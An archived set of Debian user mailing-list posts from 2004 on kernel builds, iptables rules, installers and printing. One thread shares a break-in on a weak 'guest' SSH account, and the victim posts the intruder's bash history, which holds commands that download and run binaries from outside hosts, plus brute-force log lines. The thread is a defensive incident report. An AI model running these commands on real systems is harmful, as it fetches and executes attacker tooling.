Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On July 22, 2004 10:59 pm, s. keeling wrote: > Incoming from Scarletdown: > > An example of a good password (though since I'm posting it here, it can > > no longer be considered good) is: > > > > [EMAIL PROTECTED] > > I disagree. A cracking program is going to attempt to match > permutations of dictionary words. This will not add much more time to > reach the solution. Better is concatenation of two strings that won't > match a dictionary pattern: > > b1rDW0rm > I'm pretty sure dictionary attack also look for this. (?) Use other characters that will make the word absolutely not dictionar- related x[([EMAIL PROTECTED])~(w0rD)]x Still as easy to remember (longer to type though) > > |< == K > > | > > >< == X > > > > > |> == P > > > > Anyone else care to add to this little list? > > Hadn't thought of those. Cute. > > Apparently, the best is to replace crypt based passwords with RSA > based, and use longer passwords. > > > -- > Any technology distinguishable from magic is insufficiently advanced. > (*) http://www.spots.ab.ca/~keeling > - - - -- Mathieu Ducharme [EMAIL PROTECTED] Use GPG to avoid spam trap -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBAIcingfWgVs5hW0RAj20AKDJrhzVJg6isKeIAia/iEaGC3NeHQCgpBkf Yh5JlhDFcg1fCEBwrpaKmvY= =+Wfi -END PGP SIGNATURE-
Re: See what a weak password will get ya?
On Thu, 22 Jul 2004 17:42:53 -0500 Paul Stolp <[EMAIL PROTECTED]> wrote: > > I checked in on some bittorrent progress today at lunch, noticed my > process monitor showing full activity. Ran top, saw user "guest" logged > on, running 4 instances of a program named "t", and short term load > average over 4. AAGGGHHH! > shutdown -h now ! Believe it or not, this is often a bad idea. It's often easier to determine the scope of a compromise by watching the intrude for a little while than to attempt to find out afterwards with forensics. > pull network cable > reboot > look for damage, whew, I was O.K. How did you determine this? -c -- Chris Metzler [EMAIL PROTECTED] (remove "snip-me." to email) "As a child I understood how to give; I have forgotten this grace since I have become civilized." - Chief Luther Standing Bear pgpQjMBW1NFKJ.pgp Description: PGP signature
subscribe
___ Join Excite! - http://www.excite.com The most personalized portal on the Web! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Multihead display without a desktop on second monitor
On 22 Jul 2004, Frank H. Baker wrote: > at the top and bottom on a uniform background. I have not enabled > Xinerama in XF86Config-4. that should give you one desktop .. but also allow you to drag xterms across the monitor which is NOT the same as DISPLAY=localhost:0.1 with xinerama off > Do you have any suggestions how, for instance, to prevent a display > manager from running on the two auxiliary screens or, I guess, > to prevent a session from displaying on them? my guess is you have to force feed it the defaults ... - each distro might have different ideas of different XF86Config defaults i've had that 2nd desktop to show up or disappear based on which XF86Config i'm using c ya alvin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
Incoming from Scarletdown: > > An example of a good password (though since I'm posting it here, it can > no longer be considered good) is: > > [EMAIL PROTECTED] I disagree. A cracking program is going to attempt to match permutations of dictionary words. This will not add much more time to reach the solution. Better is concatenation of two strings that won't match a dictionary pattern: b1rDW0rm > |< == K > >< == X > |> == P > > Anyone else care to add to this little list? Hadn't thought of those. Cute. Apparently, the best is to replace crypt based passwords with RSA based, and use longer passwords. -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
OT: Re: See what a weak password will get ya?
Incoming from Paul Stolp: > I checked in on some bittorrent progress today at lunch, noticed my > process monitor showing full activity. Ran top, saw user "guest" logged > on, running 4 instances of a program named "t", and short term load > average over 4. AAGGGHHH! > shutdown -h now ! > pull network cable > reboot > look for damage, whew, I was O.K. -- I'm sure it helps to be up to date ... How did you manage to verify that? Are you running chkrootkit? tripwire? Something else? (0) keeling /home/keeling_ host smenlove.home.ro smenlove.home.roA 81.196.20.133 (0) keeling /home/keeling_ ripe 81.196.20.133 inetnum: 81.196.20.128 - 81.196.20.159 netname: RO-RDS-HOME-RO descr:Home.RO / Go.RO country: RO admin-c: HAD6-RIPE tech-c: HAD6-RIPE status: ASSIGNED PA remarks: INFRA-AW remarks: +---+ remarks: | ABUSE CONTACT: [EMAIL PROTECTED] IN CASE OF HACK ATTACKS, | remarks: | ILLEGAL ACTIVITY, VIOLATION, SCANS, PROBES, SPAM, ETC.| remarks: +---+ ... (0) keeling /home/keeling_ ripe 131.234.157.10 inetnum: 131.234.0.0 - 131.234.255.255 netname: UNIPADERBORN descr:Universitaet Paderborn country: DE ... (0) keeling /home/keeling_ host 80.110.102.105 Name: chello080110102105.508.15.vie.surfer.at Address: 80.110.102.105 (0) keeling /home/keeling_ ripe 80.110.102.105 inetnum: 80.110.48.0 - 80.110.118.255 netname: VIE-15-CUSTOMER-LANCITY descr:chello Austria descr:Lancity Customers in Vienna, Headend 15 country: AT admin-c: HMCB1-RIPE tech-c: HMCB1-RIPE status: ASSIGNED PA remarks: Contact [EMAIL PROTECTED] concerning criminal remarks: activities like spam, hacks, portscans > Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from > 156.17.99.11 > port 37228 ssh2 > Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user > guest by ( > uid=0) ...^ > Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from > 80.110.102.105 port 3938 ssh2 > Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user > guest by (uid=0) > Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure; > logname=guest uid=1002 euid=0 tty= ruser= .^^ > Just wanted to share the need for strong passwords. Not to mention backups and fresh installation media? -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Building 2.6.x kernel
[EMAIL PROTECTED]([EMAIL PROTECTED]) is reported to have said: > Maybe my last message went astray. > > Has anyone had any success using a 2.6.[67] kernel built themselves? > Yes. Using the old fashoned way and using make-kpkg. : uname -a Linux buddy 2.6.7 #1 Sat Jul 17 21:15:34 EDT 2004 i686 GNU/Linux > I have now built a 2.6.6 and a 2.6.7 using make_kpkg. Both have > apparently installed OK but panicked because they couldn't mount my > root partition. Looks like you don't have the option for the ext3 FS enabled. > > Said partition is an ext3 created during a stock sarge install. The > original 2.4.25 and an installed 2.6.6-1.k7 kernel have no problems. > What does [grep -i ext3 /boot/config-2.6.7 report? Mine shows CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y # CONFIG_EXT3_FS_POSIX_ACL is not set # CONFIG_EXT3_FS_SECURITY is not set > Also, I cannot create the modules for either 2.6.6 or 2.6.7, The > attempt to make the modules eventally barfs telling me that there is a > missing file /usr/src/kernel-source-2.6.7/include.linux/modversions.h > and tells me to run make dep to creat it. Do you have module-init-tools 3.1-pre5-1 installed? There have been some changes in how the modules load. See the Documenation dir for info on that. > > But running make dep simply results in a mesage saying that make dep > is no longer necessary. WRONG. Did you copy the .config file from /usr/src/linux-2.6.6 to the 2.6.7 dir and then do a make oldconfig? If not then do a make [config|menuconfig|xconfig] in the 2.6.7 dir again, and check that you enabled the ext3 fs. :-) HTH, YMMV, HAND :-) Wayne -- "It's not just a computer -- it's your ass." -- Cal Keegan ___ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
Scarletdown wrote: |< == K >< == X |> == P Anyone else care to add to this little list? 0 == O $ == S |-| == H |_| == U |_ == L \/\/ == W /\/\ == M |V| == M |\| == N |-o-| == tie fighter {-o-} == tie interceptor 8~~ ? 8-) ... ! --dircha -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: iptables filter rules Question??
Incoming from [EMAIL PROTECTED]: > [s. keeling:] > > > > I use exactly the same rule here: > > > > iptables -A INPUT -i ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT > > EULER:~# iptables -A INPUT -i ppp0 -m state --state ESTABLISHED,RELATED -j > ACCEPT > iptables: No chain/target/match by that name > EULER:~# As I say, I use the same rule (direct cut+paste from my script): iptables -A INPUT -i ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT All I can say is this: -- ii iptables 1.2.6a-5 IP packet filter administration tools for 2.4.4+ ker -- and this: -- (0) root /root_ iptables -nvL Chain INPUT (policy ACCEPT 80543 packets, 9554K bytes) pkts bytes target prot opt in out source destination 84 4606 ACCEPT tcp -- ppp0 * 0.0.0.0/00.0.0.0/0 tcp dpt:113 374 23156 LOGall -- * * !127.0.0.10.0.0.0/0 state NEW LOG flags 0 level 4 374 23156 DROP all -- * * !127.0.0.10.0.0.0/0 state NEW 12452 9614K ACCEPT all -- ppp0 * 0.0.0.0/00.0.0.0/0 state RELATED,ESTABLISHED Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 570 packets, 47066 bytes) pkts bytes target prot opt in out source destination 34743 3391K ACCEPT all -- * * 0.0.0.0/00.0.0.0/0 state NEW,RELATED,ESTABLISHED -- If you're not running stable, check the man page. Maybe they've renamed something since Woody. -- Any technology distinguishable from magic is insufficiently advanced. (*) http://www.spots.ab.ca/~keeling - - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: See what a weak password will get ya?
Paul Stolp wrote: I checked in on some bittorrent progress today at lunch, noticed my I'm not sure the July 19 log snippet is related, but seems likely. Anyways, I've re-downloaded the files the attacker used and removed (for posterity.) I changed all passwords, IP Address, I found the evidence at about 12:24. Just wanted to share the need for strong passwords. I second that recommendation. I always prefer to have passwords with the following features: Minimum of 8 characters At least 1 capital letter At least 1 lower case letter At least 1 number At least 1 special character An example of a good password (though since I'm posting it here, it can no longer be considered good) is: [EMAIL PROTECTED] Meets all the above specifications, plus is readable. Combining special characters to make letters also helps. Though at the moment, I can only think of 3 combinations... |< == K >< == X |> == P Anyone else care to add to this little list? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
[Fwd: (GASP!) Looking for commercial quality financial software]
Original Message Subject: (GASP!) Looking for commercial quality financial software Date: Thu, 22 Jul 2004 17:53:06 -0500 From: Bradley Pursley <[EMAIL PROTECTED]> Newsgroups: linux.debian.user I am converting everything from Windows to Linux in high hopes of eliminating Windows totally but am having a serious problem finding a decent financial software package. I have tried both GnuCash and CBB (Checkbook Balancer) and both fall very far short of what is needed. I am willing to pay for a low cost commercial package if necessary. Any help here? Bradley -- Bradley, How about sql-ledger? http://www.sql-ledger.org/ http://packages.debian.org/unstable/web/sql-ledger I've forwarded this to the debian-user mail list, perhaps others will respond. The newsgroup is a one-way gateway from the list. Regards, Ralph -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Debian install breaks on 'Configuring Locales'
John Hechtman wrote: I moved from Suse to Slackware, because the stock Suse was WAY slow. And then from Slackware to Debian because no one can tell me why my floppy drive mounts in read-only in Slackware when using any GUI. Now I've dl'd the Debian CD iso images and burned them to disks. This is with the 'Woody' 30r2-i386 set of seven CD's, plus the updates CD. I started the install, and it went fine through the first part. But it breaks each time at 'Configuring Locales'. You can select more locales, but the 'Enter' key will not give an 'accept' - it just sits there. No key on the keyboard will 'accept', and get me past this. In fact, after it breaks on the first cycle, the 'Enter' key brings up the 'Help' menu. This is using disk 1 - the 'vanilla' kernel. I tried it with bf24 to see if that helps - it didn't. Can't I get a stock version of Linux to run 'out of the box', with decent speed? I'm not asking a lot, Web access, email, and a functioning floppy drive... Further, the Debian install doc, which was lovingly detailed up to Chapter 8, breaks down and does not deal with several of the screen options presented during setup. Including, of course, the 'Configuring Locales' option, or any way of avoiding it. Can I scream now, or must I wait? You can scream any time you want. You're going to be frustrated no matter what, if you're new to Linux. It's a different world. On the other hand, once you've spent some time here, going back to Windows will frustrate you more. So if you're going to turn back, do it now, before you get spoiled. I can't answer your specific question, but I can tell you that if you have network access, you'll do better to forget the CDs and instead download the 100MB CD image for the new beta Sarge installer, and install just the base stuff, then use the network to pull down what you want. You'll get fresher (newer) packages, and it'll probably go a lot smoother (the new beta installer is better than the old Woody installer). You can find the beta installer at: http://www.debian.org/devel/debian-installer/ -- Kent -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
See what a weak password will get ya?
I checked in on some bittorrent progress today at lunch, noticed my process monitor showing full activity. Ran top, saw user "guest" logged on, running 4 instances of a program named "t", and short term load average over 4. AAGGGHHH! shutdown -h now ! pull network cable reboot look for damage, whew, I was O.K. -- I'm sure it helps to be up to date on security and running 2.6.7. changed all passwords to much stronger Anyhow, I figure turnabout is fair play, so, here's the bash history from the "guest" user account, along with the IP addresses the attacker logged in from: w uname -a wc -l /etc/passwd wget smenlove.home.ro/t.gz ;tar xzvf t.gz ; rm -rf t.gz ; ./t ./t ./t ./t ./t ./t ls rm -rf t kill -9 %1 kill -9 %1 wget smenlove.home.ro/h.tgz ; tar xzvf h.tgz ; rm -rf h.tgz ; ./h2 w id ./h2 rm -rf h2 wget vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2 -d brk.bz2;chmod +x br k;./brk wget vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2 -d brk.bz2;chmod +x br k;./brk ls passwd exit Jul 19 19:54:41 greta sshd[7071]: Illegal user admin from 131.234.157.10 Jul 19 19:54:41 greta sshd[7071]: error: Could not get shadow information for NO USER Jul 19 19:54:41 greta sshd[7071]: Failed password for illegal user admin from 13 1.234.157.10 port 35860 ssh2 Jul 19 19:54:44 greta sshd[7073]: Illegal user admin from 131.234.157.10 Jul 19 19:54:44 greta sshd[7073]: error: Could not get shadow information for NO USER Jul 19 19:54:44 greta sshd[7073]: Failed password for illegal user admin from 13 1.234.157.10 port 35917 ssh2 Jul 19 19:54:46 greta sshd[7075]: Illegal user user from 131.234.157.10 Jul 22 10:24:38 greta sshd[22403]: Failed password for illegal user test from 15 6.17.99.11 port 37183 ssh2 Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from 156.17.99.11 port 37228 ssh2 Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user guest by ( uid=0) Jul 22 10:24:47 greta sshd[22407]: (pam_unix) session closed for user guest Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from 80.110.102.105 port 3938 ssh2 Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user guest by (uid=0) Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure; logname=guest uid=1002 euid=0 tty= ruser= rhost= user=guest Jul 22 12:13:16 greta sshd[22597]: (pam_unix) session closed for user guest I'm not sure the July 19 log snippet is related, but seems likely. Anyways, I've re-downloaded the files the attacker used and removed (for posterity.) I changed all passwords, IP Address, I found the evidence at about 12:24. Just wanted to share the need for strong passwords. -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: iptables filter rules Question??
> Incoming from [EMAIL PROTECTED]: >> >> This is my rule set: >> >> 1 iptables -P INPUT DROP >> 2 iptables -A INPUT -p icmp -j ACCEPT >> 3 iptables -A INPUT -i lo -j ACCEPT >> 4 iptables -A INPUT -i ppp0 -p tcp --dport 22 -j ACCEPT >> 5 iptables -A INPUT -i ppp0 -m state --state ESTABLISHED,RELATED -j >> ACCEPT >> 6 iptables -A INPUT -i ppp0 -p tcp -j REJECT --reject-with tcp-reset >> 7 iptables -A INPUT -i ppp0 -p udp -j REJECT >> 8 iptables -A INPUT -i ppp0 -j REJECT --reject-with >> icmp-proto-unreachable >> >> 9 iptables -P FORWARD DROP >> 10 iptables -P OUTPUT ACCEPT >> >> * >> >> 1.) Line number five does not work, iptables complains when I issue that >> rule. > > I use exactly the same rule here: > > iptables -A INPUT -i ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT > Do you get this error or ... what does this error mean ... EULER:~# iptables -A INPUT -i ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables: No chain/target/match by that name EULER:~# >> 2.) The functionality I want from my firewall rule set is: >> >> Deny all incoming traffic except, port 22 ssh and allow pings >> >> Allow all outgoing traffic, as well as, it should be able to come >> back in if it originated from my box >> >> The above rule set did work when I had an ethernet connection on a >> different network, but when I changed to dialup, I have problems getting >> these to work. > > My situation is close, the exception being incoming ssh. I do, > however, allow incoming identd (handled by fauxident): > > iptables -A OUTPUT -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT > iptables -t filter -I INPUT -i ppp0 -m tcp -p tcp --dport 113 -j ACCEPT > iptables -A INPUT -s ! 127.0.0.1/32 -m state --state NEW -j LOG > iptables -A INPUT -s ! 127.0.0.1/32 -m state --state NEW -j DROP > iptables -A INPUT -i ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT > > > -- > Any technology distinguishable from magic is insufficiently advanced. > (*) http://www.spots.ab.ca/~keeling > - - > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Debian install breaks on 'Configuring Locales'
On Fri, 2004-07-23 at 09:15, John Hechtman wrote: > Now I've dl'd the Debian CD iso images and burned them to disks. > This is with the 'Woody' 30r2-i386 set of seven CD's, plus the updates > CD. Are you intending this installation to be used for a production server, or for a personal desktop? If you want a production server, you'll have to persist with Debian 3.0 (aka woody). The install procedure is difficult, but the resulting installation is very stable and secure. If you want a desktop, or a more experimental server, then you should download the installer for the Debian Testing release (aka "Sarge"). The packages installed are far more up-to-date, and the install procedure is light-years ahead of the old installer. The only disadvantage is that the occasional package doesn't work (the dangers of using what is effectively a "beta" release). Search for "debian-installer" on the www.debian.org home page for links to the latest releases. Note that the installer is just a single CD, and the rest of the OS gets downloaded over the internet, so you'll need a decent network connection if you want to do this. There are ways to download CDs of "testing"; see documentation for "jigdo" which should be linked somewhere from the main page. Regards, Simon -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: /cdrom vs. /media/cdrom
On Fri, 2004-07-23 at 02:32, Joey Hess wrote: > Paul Johnson wrote: > > I don't have a /media, and my laptop, which I just installed Debian on, > > also doesn't have a /media. ??? > > Then you didn't install sarge using a current version of the installer. Continuing from this, is there a way to automatically populate the /media directory afterwards with correct names? Thanks, Kaj -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Webmin dies on startup
Since upgrading my system on 10th July, webmin hasn't worked. When I try running "/etc/init.d/webmin start", it says "Starting webmin: webmin" and returns control to the command line - but no processes persist and no ports stay open. What's more, I don't even get any log output in /var/log/webmin/webmin.log or /var/log/messages. I usually run the stable version, but I have also tried installing the testing version, to no avail. I have tried removing and re-installing both versions. Has anybody got any ideas? TIA, Jon -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Subscribe
___ Join Excite! - http://www.excite.com The most personalized portal on the Web! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Debian install breaks on 'Configuring Locales'
Below is a copy of my most recent post to LinuxQuestions. Can you help withthis?I moved from Suse to Slackware, because the stock Suse was WAY slow.And then from Slackware to Debian because no one can tell me why my floppydrive mounts in read-only in Slackware when using any GUI.Now I've dl'd the Debian CD iso images and burned them to disks. This is with the 'Woody' 30r2-i386 set of seven CD's, plus the updates CD. I started the install, and it went fine through the first part. But it breaks each time at 'Configuring Locales'. You can select morelocales, but the 'Enter' key will not give an 'accept' - it just sits there. No key on the keyboard will 'accept', and get me past this.In fact, after it breaks on the first cycle, the 'Enter' key brings up the'Help' menu.This is using disk 1 - the 'vanilla' kernel. I tried it with bf24 tosee if that helps - it didn't.Can't I get a stock version of Linux to run 'out of the box', with decentspeed? I'm not asking a lot, Web access, email, and a functioning floppydrive...Further, the Debian install doc, which was lovingly detailed up to Chapter8, breaks down and does not deal with several of the screen optionspresented during setup. Including, of course, the 'Configuring Locales'option, or any way of avoiding it.Can I scream now, or must I wait?
Abwesenheitsnotiz: {Spam?:12.78} Postcard
Liebe Kollegen, liebe Chefs - oder wer sonst noch versucht hat, mich zu erreichen! Ich bin bis einschließlich 31. Juli im Urlaub. Auch über Handy bin ich nicht zu kriegen. In dringenden Fällen wenden Sie sich bitte an das Berliner Stern-Büro, Tel: 030-20 224 220. Oder haben Sie einfach ein bißchen Geduld. Ich melde mich nach meiner Rückkehr. Bis dahin. Kerstin Schneider Stern-Redaktion
Re: Sarge
On 07/21/04 22:40, Haines Brown wrote: "Jerry Wong" <[EMAIL PROTECTED]> writes: What is the meaning of "SARGE" and how to pronounce it. -- Jerry Wong I was hoping someone would provide an authoritative response, but not so far. I'll reply at a simple level, and await someone to jump in to correct me. It seems likely that "sarge" is the common US English abbreviation for the term "sargeant," which is a military rank. It would be pronounced with a soft g and the e is not pronounced. I assume you are talking about testing debian, and it may be that whoever cooked up the name had something else in mind. I've no idea why the versions were named potato, woody, sarge and sid. From the Debian FAQ: http://www.debian.org/doc/FAQ/ch-ftparchives.en.html#s-codenames 5.3.2 Where do these codenames come from? So far they have been characters taken from the movie "Toy Story" by Pixar. * buzz (Buzz Lightyear) was the spaceman, * rex was the tyrannosaurus, * bo (Bo Peep) was the girl who took care of the sheep, * hamm was the piggy bank, * slink (Slinky Dog) was the toy dog, * potato was, of course, Mr. Potato, * woody was the cowboy. * sarge was the sergeant of the Green Plastic Army Men. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Netscape seems to default to Postscript(tm of Adobe), but I don't have a postscript printer
Printing from Netscape seems to default to Postscript(tm of Adobe), but I don't have a postscript printer. Is there a way to set up 2 print spools? One called hpprinter and one called hpprinter-P? Both would be the same except hpprinter-P would go thru a postscript to raster converter to emulate postscript? I have been playing around with cups and kde printer, but I am still lost in the jungle. Or can Netscape be configured to not output postscript? Thanks in advance, J ___ Join Excite! - http://www.excite.com The most personalized portal on the Web! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: dpkg/apt question
On 2004-07-22, Preston Boyington penned: > i have "inherited" an existing debian box and want to change the > packages to suit me and the office that it will now be used. > > i would like to take the installed packages listed from: > > dpkg --get-selections > packages.txt > > and edit the file to reflect what i actually want/need on the box. > > after i get the edited list prepared, is there a command i can issue > that will instruct apt or dpkg to add/remove the programs to reflect > my changes? > > on a fresh install i would do: > > dpkg --set-selections < packages.txt > > then: > > apt-get install > > but i don't know the command to do this from a existing setup. > > would someone shed some light on this for me? > > thanks, Preston Is there any particular reason that you don't want to use aptitude or dselect to interactively change the installed packages? -- monique -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Mail Services "Opinion"
Hi! Debian Users Need some info about Mail Server. There are some request from my management about Mail Services.Below are the list. Need your opnion. 1). Must can support multiple domain. I have Domain for abc.com.my and cde.com.my 2). The email user must can be control to become a local user or external user. local user - only can send email between domain, it mean that user from domain abc.com.my can send email to cde.com.my but can't send to other beside this two domain. 3). all outgoing email must can be store at one location for top management to view if upon request. (if possible by selected user) 4). all incoming email must can be store at one location for top management to view back upon request. (If possible by selected user) 5). all incoming or out going email with attachment must can be on hold by postmaster for checking purpose, before release to user or send out. 6). email from specify address must can be forward to special account for checking purpose. example I have user1 which can send and received external email. but I don't him to received email from user [EMAIL PROTECTED] ,so any email from [EMAIL PROTECTED] will not reach to user1 account but will reach to postmaster account. Thank You Support
Multihead display without a desktop on second monitor
I have a 3 head system: one display for the console and two others for showing graphics on a clean (unadorned) screen that I control simply using xlib functions. This configuration has been working as prescribed under Mandrake 9.0, but when I tried installing it on Debian sarg/Linux 2.6, the uniform hatched screen displayed by X was replaced, after I logged in, by a screen with tool panels at the top and bottom on a uniform background. I have not enabled Xinerama in XF86Config-4. Do you have any suggestions how, for instance, to prevent a display manager from running on the two auxiliary screens or, I guess, to prevent a session from displaying on them? Thanks for any help, Frank Baker -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Detaching and reattaching a process to different terminals?
On Thu, Jul 22, 2004 at 09:00:46AM -0400, Stephen Touset wrote: > I'm running a program for a research study I'm involved in, but I've run > into a slight problem. I executed it on an xterm (and it's been running > for a few days now, so I don't want to stop it mid-calculation), but > today is a workday. At work, I use two screens on my laptop. The only > way to accomplish this is to restart X so Xinerama can take effect. > Unfortunately, this will also have the nasty side effect of killing > execution. > > Is there any way to detach the pid from that terminal and reattach it to > one of the consoles? Or background it in a way where it will survive X > restarting? It's not critical, but it's something I've wondered before, > and which will come in extremely handy today. > I don't know if it will do what you want since I think it was orphaned a bit, but is in a working state, although a bit limited. Have a look at http://cryopid.berlios.de/ It spawned out of an idea on software suspend development list. It will suspend the whole process saving its state and will allow you to restart it later. IIRC it didn't get to the point of handling open file descriptors (and thus sockets), and doesn't restore the process pid, but if your process doesn't have open file descriptors and doesn't rely on its pid it may work > -- > Stephen Touset <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Xeon HT or not HT
On Thu, Jul 22, 2004 at 01:33:50PM -0400, Dragan Cvetkovic wrote: > Greg Folkert <[EMAIL PROTECTED]> writes: > > > On Thu, 2004-07-22 at 05:10, nx13372 wrote: > >> I'm using kernel 2.4.26-1-686-smp. > >> I have a dual xeon box. If in the bios i enable the HT i'll get 4 cpus, > >> if not i'll get 2 cpus. > >> What is bettter? > > [snip] > > > > > Without hyperthreading you have 2 Things doing MANY MANY small and big > > jobs. Sort of like having a 500HP motor on each your lawn mowers. Big, > > clunky not AS flexible. > > > > With HyperThreading you 4 smaller things (each 1/2 the capacity of the > > the nonHT processors) doing many many small and big jobs. Sort of like > > having having a 240HP(with turbo boost to ~ 480HP if needed) motor on > > each of your lawn mowers. 4 Smaller, powerful and yet more flexible to > > do the job, the power is distributed based on need. > > > > I think the answer is clear. > > Is it? Does Linux 2.4 performs as good on a 4 CPU machine as it does on a > 2 CPU one? > My understanding is that if you have multiple real cpus with HT, then you should use a 2.6 kernel, since 2.4 assigns processes to the first two "virtual cpus" before it moves on to subsequent real cpus. Though maybe that has changed now. cheers dc -- David Purton [EMAIL PROTECTED] For the eyes of the LORD range throughout the earth to strengthen those whose hearts are fully committed to him. 2 Chronicles 16:9a signature.asc Description: Digital signature
Re: flash and mozilla (and firefox and epiphany)
Paul Yeatman <[EMAIL PROTECTED]> writes: > I now am convinced that the problem resides with the appearance that > Flash accesses /dev/dsp directly creating a conflict anytime another > application has already locked the dsp device first, such as esd. The > Mozilla wrapper that seems to offer a way around this doesn't appear to > work for me. > > My current solution is to change the default behavior of esd from > "auto_spawn" being set to off to being on and, as I'm using gnome, > either disabling sound in gnome altogether or killing the esd process > that is started once I log in. This solution is satisfactory for > the moment but took quite awhile to figure out. Have you tried the '-as' option of esd? I use 'esd -as 2' to require esd to release /dev/dsp 2 seconds after it finishes, so other devices can use it. That allows me to use programs with both esd and /dev/dsp output, but not at the same time. -- Carl Johnson[EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Continue asking about RSH on Linux?
On Wed, 21 Jul 2004 22:41:42 -0700 (PDT) Hai Nguyen <[EMAIL PROTECTED]> wrote: > Dear [EMAIL PROTECTED] > > What can I do to corect this problem? > (My machine is an ALPHASERVER with 6 node, the Linux version is > Red Had Linux reales 6.2 (Zoot) - Kernel 2.2.14-6.0 on an alpha). humm, this list is really about debian not redhat. > If using SSH kind of SSH is appropriate for my machine and where I could get them? > I hope you continue help me. Thank you very much. I would look on http://www.rpmfind.net/ for the ssh rpms. > I look forward to hearing your answers. > > Nguyen Thanh Hai > Le Qui Don University, Hanoi, Vietnam Good Luck. -- .''`. /\/'`\ [EMAIL PROTECTED] : :' :.::/:... irc://fslc.usu.edu/#cira `. `') .//::(:###( )::.._/^ gps:41°45'N 111°49'W `- ..:@://" ,|) _/.gpg:1024D/A7AAF777
Building 2.6.x kernel
